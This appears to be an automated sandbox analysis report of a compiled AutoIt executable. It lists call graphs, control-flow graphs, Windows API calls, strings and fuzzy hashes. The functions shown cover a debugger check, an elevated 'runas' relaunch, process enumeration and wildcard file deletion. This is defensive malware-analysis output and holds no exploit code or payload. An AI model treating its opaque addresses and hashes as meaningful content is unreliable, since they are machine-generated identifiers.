__wsopen_s 104902->104973 104941 f1e960 104903->104941 104906 f1f47a 104906->104875 104907 f64584 104907->104907 104909 f1f710 104908->104909 104930 f1f7dc ISource 104909->104930 104990 f305b2 5 API calls __Init_thread_wait 104909->104990 104912 f645d9 104914 f1bf73 8 API calls 104912->104914 104912->104930 104913 f1bf73 8 API calls 104913->104930 104917 f645f3 104914->104917 104915 f1be2d 39 API calls 104915->104930 104991 f30413 29 API calls __onexit 104917->104991 104920 f83fe1 81 API calls 104920->104930 104921 f645fd 104992 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104921->104992 104923 f20340 206 API calls 104923->104930 104925 f1bed9 8 API calls 104925->104930 104926 f1fae1 104926->104875 104927 f21ca0 8 API calls 104927->104930 104930->104913 104930->104915 104930->104920 104930->104923 104930->104925 104930->104926 104930->104927 104989 f2b35c 206 API calls 104930->104989 104993 f305b2 5 API calls __Init_thread_wait 104930->104993 104994 f30413 29 API calls __onexit 104930->104994 104995 f30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104930->104995 104996 f95231 101 API calls 104930->104996 104997 f9731e 206 API calls 104930->104997 104932 f2e959 104931->104932 104933 f2e928 104931->104933 104932->104875 104933->104932 104934 f2e94c IsDialogMessageW 104933->104934 104935 f6eff6 GetClassLongW 104933->104935 104934->104932 104934->104933 104935->104933 104935->104934 104936->104875 104937->104875 104938->104875 104939->104898 104940->104898 104942 f20340 206 API calls 104941->104942 104953 f1e99d 104942->104953 104943 f631d3 104987 f83fe1 81 API calls __wsopen_s 104943->104987 104945 f1ea0b ISource 104945->104906 104946 f1edd5 104946->104945 104958 f3017b 8 API calls 104946->104958 104947 f1eac3 104947->104946 104949 f1eace 104947->104949 104948 f1ecff 104951 f631c4 104948->104951 104952 f1ed14 104948->104952 104950 f3014b 8 API calls 104949->104950 104962 f1ead5 __fread_nolock 104950->104962 104986 f96162 8 API calls 104951->104986 104956 f3014b 8 API calls 104952->104956 104953->104943 104953->104945 104953->104946 104953->104947 104954 f1ebb8 104953->104954 104957 f3014b 8 API calls 104953->104957 104968 f1eb29 ISource __fread_nolock 104953->104968 104959 f3017b 8 API calls 104954->104959 104966 f1eb6a 104956->104966 104957->104953 104958->104962 104959->104968 104960 f1eaf6 104960->104968 104974 f1d260 104960->104974 104961 f3014b 8 API calls 104961->104960 104962->104960 104962->104961 104964 f631b3 104985 f83fe1 81 API calls __wsopen_s 104964->104985 104966->104906 104968->104948 104968->104964 104968->104966 104969 f6318e 104968->104969 104971 f6316c 104968->104971 104982 f144fe 206 API calls 104968->104982 104984 f83fe1 81 API calls __wsopen_s 104969->104984 104983 f83fe1 81 API calls __wsopen_s 104971->104983 104973->104907 104975 f1d2c6 104974->104975 104976 f1d29a 104974->104976 104978 f20340 206 API calls 104975->104978 104977 f1f6d0 206 API calls 104976->104977 104981 f1d2a0 104976->104981 104977->104981 104979 f6184b 104978->104979 104979->104981 104988 f83fe1 81 API calls __wsopen_s 104979->104988 104981->104968 104982->104968 104983->104966 104984->104966 104985->104966 104986->104943 104987->104945 104988->104981 104989->104930 104990->104912 104991->104921 104992->104930 104993->104930 104994->104930 104995->104930 104996->104930 104997->104930 104998 f3f06e 104999 f3f07a ___BuildCatchObject 104998->104999 105000 f3f086 104999->105000 105001 f3f09b 104999->105001 105017 f3f649 20 API calls __dosmaperr 105000->105017 105011 f394fd EnterCriticalSection 105001->105011 105004 f3f0a7 105012 f3f0db 105004->105012 105005 f3f08b 105018 f42b5c 26 API calls __wsopen_s 105005->105018 105008 f3f096 __wsopen_s 105011->105004 105020 f3f106 105012->105020 105014 f3f0e8 105016 f3f0b4 105014->105016 105040 f3f649 20 API calls __dosmaperr 105014->105040 105019 f3f0d1 LeaveCriticalSection __fread_nolock 105016->105019 105017->105005 105018->105008 105019->105008 105021 f3f114 105020->105021 105022 f3f12e 105020->105022 105044 f3f649 20 API calls __dosmaperr 105021->105044 105024 f3dcc5 __fread_nolock 26 API calls 105022->105024 105025 f3f137 105024->105025 105041 f49789 105025->105041 105026 f3f119 105045 f42b5c 26 API calls __wsopen_s 105026->105045 105029 f3f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105029->105014 105031 f3f23b 105033 f3f248 105031->105033 105037 f3f1ee 105031->105037 105032 f3f1bf 105035 f3f1dc 105032->105035 105032->105037 105047 f3f649 20 API calls __dosmaperr 105033->105047 105046 f3f41f 31 API calls 4 library calls 105035->105046 105037->105029 105048 f3f29b 30 API calls 2 library calls 105037->105048 105038 f3f1e6 105038->105029 105040->105016 105049 f49606 105041->105049 105043 f3f153 105043->105029 105043->105031 105043->105032 105044->105026 105045->105029 105046->105038 105047->105029 105048->105029 105050 f49612 ___BuildCatchObject 105049->105050 105051 f49632 105050->105051 105052 f4961a 105050->105052 105053 f496e6 105051->105053 105058 f4966a 105051->105058 105075 f3f636 20 API calls __dosmaperr 105052->105075 105080 f3f636 20 API calls __dosmaperr 105053->105080 105056 f4961f 105076 f3f649 20 API calls __dosmaperr 105056->105076 105057 f496eb 105081 f3f649 20 API calls __dosmaperr 105057->105081 105074 f454ba EnterCriticalSection 105058->105074 105062 f49627 __wsopen_s 105062->105043 105063 f496f3 105082 f42b5c 26 API calls __wsopen_s 105063->105082 105064 f49670 105066 f49694 105064->105066 105067 f496a9 105064->105067 105077 f3f649 20 API calls __dosmaperr 105066->105077 105069 f4970b __fread_nolock 28 API calls 105067->105069 105071 f496a4 105069->105071 105070 f49699 105078 f3f636 20 API calls __dosmaperr 105070->105078 105079 f496de LeaveCriticalSection __wsopen_s 105071->105079 105074->105064 105075->105056 105076->105062 105077->105070 105078->105071 105079->105062 105080->105057 105081->105063 105082->105062

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 234 f15fc8-f16037 call f1bf73 GetVersionExW call f18577 239 f5507d-f55090 234->239 240 f1603d 234->240 242 f55091-f55095 239->242 241 f1603f-f16041 240->241 245 f16047-f160a6 call f1adf4 call f155dc 241->245 246 f550bc 241->246 243 f55097 242->243 244 f55098-f550a4 242->244 243->244 244->242 247 f550a6-f550a8 244->247 259 f55224-f5522b 245->259 260 f160ac-f160ae 245->260 250 f550c3-f550cf 246->250 247->241 249 f550ae-f550b5 247->249 249->239 252 f550b7 249->252 253 f1611c-f16136 GetCurrentProcess IsWow64Process 250->253 252->246 255 f16195-f1619b 253->255 256 f16138 253->256 258 f1613e-f1614a 255->258 256->258 261 f16150-f1615f LoadLibraryA 258->261 262 f55269-f5526d GetSystemInfo 258->262 263 f5522d 259->263 264 f5524b-f5524e 259->264 265 f55125-f55138 260->265 266 f160b4-f160b7 260->266 270 f16161-f1616f GetProcAddress 261->270 271 f1619d-f161a7 GetSystemInfo 261->271 267 f55233 263->267 268 f55250-f5525f 264->268 269 f55239-f55241 264->269 272 f55161-f55163 265->272 273 f5513a-f55143 265->273 266->253 274 f160b9-f160f5 266->274 267->269 268->267 280 f55261-f55267 268->280 269->264 270->271 281 f16171-f16175 GetNativeSystemInfo 270->281 282 f16177-f16179 271->282 278 f55165-f5517a 272->278 279 f55198-f5519b 272->279 275 f55145-f5514b 273->275 276 f55150-f5515c 273->276 274->253 277 f160f7-f160fa 274->277 275->253 276->253 283 f550d4-f550e4 277->283 284 f16100-f1610a 277->284 285 f55187-f55193 278->285 286 f5517c-f55182 278->286 287 f551d6-f551d9 279->287 288 f5519d-f551b8 279->288 280->269 281->282 289 f16182-f16194 282->289 290 f1617b-f1617c FreeLibrary 282->290 295 f550f7-f55101 283->295 296 f550e6-f550f2 283->296 284->250 291 f16110-f16116 284->291 285->253 286->253 287->253 294 f551df-f55206 287->294 292 f551c5-f551d1 288->292 293 f551ba-f551c0 288->293 290->289 291->253 292->253 293->253 297 f55213-f5521f 294->297 298 f55208-f5520e 294->298 299 f55114-f55120 295->299 300 f55103-f5510f 295->300 296->253 297->253 298->253 299->253 300->253
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00F15FF7
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00FADC2C,00000000,?,?), ref: 00F16123
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F1612A
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F16155
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F16167
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F16175
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F1617C
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00F161A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                              • API String ID: 3290436268-3101561225
                                                                                                                                                                                                              • Opcode ID: 9904250540316ef5d4d30aa7faa2712a12f5bd1fa9a0bad3ff28aee28327bbfd
                                                                                                                                                                                                              • Instruction ID: 1eee64342e6733e34030ccc483a360888399ee2ade778cd2bb8b13b11c2aa0b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9904250540316ef5d4d30aa7faa2712a12f5bd1fa9a0bad3ff28aee28327bbfd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA1C76280A6CCDFC751CBBC7CC21D97F5C6B26714B084899D481AF222E66D4588FF32

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F13368,?), ref: 00F133BB
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F13368,?), ref: 00F133CE
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FE2418,00FE2400,?,?,?,?,?,?,00F13368,?), ref: 00F1343A
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                                • Part of subcall function 00F1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F13462,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F142A0
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F134BB
                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00F53CB0
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F53CF1
                                                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FD31F4,00FE2418,?,?,?,?,?,?,?,00F13368), ref: 00F53D7A
                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F53D81
                                                                                                                                                                                                                • Part of subcall function 00F134D3: GetSysColorBrush.USER32(0000000F), ref: 00F134DE
                                                                                                                                                                                                                • Part of subcall function 00F134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00F134ED
                                                                                                                                                                                                                • Part of subcall function 00F134D3: LoadIconW.USER32(00000063), ref: 00F13503
                                                                                                                                                                                                                • Part of subcall function 00F134D3: LoadIconW.USER32(000000A4), ref: 00F13515
                                                                                                                                                                                                                • Part of subcall function 00F134D3: LoadIconW.USER32(000000A2), ref: 00F13527
                                                                                                                                                                                                                • Part of subcall function 00F134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F1353F
                                                                                                                                                                                                                • Part of subcall function 00F134D3: RegisterClassExW.USER32(?), ref: 00F13590
                                                                                                                                                                                                                • Part of subcall function 00F135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F135E1
                                                                                                                                                                                                                • Part of subcall function 00F135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13602
                                                                                                                                                                                                                • Part of subcall function 00F135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F13616
                                                                                                                                                                                                                • Part of subcall function 00F135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F1361F
                                                                                                                                                                                                                • Part of subcall function 00F1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13A3C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • runas, xrefs: 00F53D75
                                                                                                                                                                                                              • AutoIt, xrefs: 00F53CA5
                                                                                                                                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00F53CAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                              • API String ID: 683915450-2030392706
                                                                                                                                                                                                              • Opcode ID: d41b6eb1fd1b6ceb0f21763417fe0d280082e8d487be735a6641792e986e1855
                                                                                                                                                                                                              • Instruction ID: ceba76bc5b0e03cc5ded8f5b5c1edb8e972a0ee6cfca599331bb93a9bb1064ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d41b6eb1fd1b6ceb0f21763417fe0d280082e8d487be735a6641792e986e1855
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74513871108388AEC701EF649C55DEE7BBDAF85750F04042DF582961E3EB688A89F723

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871
                                                                                                                                                                                                                • Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7DCCB
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DD1B
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F7DD2C
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F7DD43
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F7DD4C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                                                              • Opcode ID: 4c897783ea5c567e9e019cdf1700ec591cc9b8dab3ccab1ab775a7c81276f486
                                                                                                                                                                                                              • Instruction ID: 67dca0af6f20087a2bdca4e61d5c476fe36ad09f94e03e88b9d99946c9d222e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c897783ea5c567e9e019cdf1700ec591cc9b8dab3ccab1ab775a7c81276f486
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D315E31408345DBC315EB60DC919EFB7E8BE96310F80495EF4D682191EB25DA49EB63

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1574 f7dd87-f7ddcf CreateToolhelp32Snapshot Process32FirstW call f7e80e 1577 f7de7d-f7de80 1574->1577 1578 f7de86-f7de95 CloseHandle 1577->1578 1579 f7ddd4-f7dde3 Process32NextW 1577->1579 1579->1578 1580 f7dde9-f7de58 call f1bf73 * 2 call f1b329 call f1568e call f1bd98 call f17bb5 call f2e36b 1579->1580 1595 f7de62-f7de69 1580->1595 1596 f7de5a-f7de5c 1580->1596 1598 f7de6b-f7de78 call f1bd98 * 2 1595->1598 1597 f7de5e-f7de60 1596->1597 1596->1598 1597->1595 1597->1598 1598->1577
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F7DDAC
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F7DDBA
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F7DDDA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F7DE87
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                              • Opcode ID: ed29cf76839296eefb8d678d0822bb2b6c21e1140768f72ee90a4ebacdb812e3
                                                                                                                                                                                                              • Instruction ID: f1505234758cee6501dffd09a0e3db092b41f2eab16e7ea6c7d6bdc01c6120b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed29cf76839296eefb8d678d0822bb2b6c21e1140768f72ee90a4ebacdb812e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C317E71108301DFD311EF50DC85AABBBF8AF99350F44092EF586871A1DB719985DB93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2407445808-0
                                                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                              • Instruction ID: 7983d66011a916c20449f3ed22104b253262333c8a3694c9222060fbd777db62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C31D9B1A00105DFC718CF58D4A0B69FBA5FB49320F2486A6E449CB252DB31EDC1EBC0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetInputState.USER32 ref: 00F1EF07
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00F1F107
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F228
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00F1F27B
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00F1F289
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F29F
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00F1F2B1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2189390790-0
                                                                                                                                                                                                              • Opcode ID: 6fd0c35f8f184c4013e9e376ef45ae4fba0bd60b5e3cf7fe4e7041a0d4aeb98b
                                                                                                                                                                                                              • Instruction ID: 2c2763ed7aaf13cbcfdb2706d683b83568a64471d2ddf57d1edf498ab6094582
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fd0c35f8f184c4013e9e376ef45ae4fba0bd60b5e3cf7fe4e7041a0d4aeb98b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9322670A04346EFD728DF24C884BAAB7E4BF85324F14452DF85687291C775E988FB82

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F13657
                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00F13681
                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F13692
                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00F136AF
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F136BF
                                                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 00F136D5
                                                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F136E4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                                                              • Opcode ID: 074fc9bee8c6744e1162bb8e89ca7236c4e27d9954ed2519cd8f1e6aaf270bb2
                                                                                                                                                                                                              • Instruction ID: 4a4d05ec25867b154000cf4f88c7a311972edd08e203a9b8a88821e0b18f6306
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 074fc9bee8c6744e1162bb8e89ca7236c4e27d9954ed2519cd8f1e6aaf270bb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0421E3B1D0125CAFDB44DFA4E889ADDBBB8FB09710F00511AF512AA2A1E7B44540AF90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
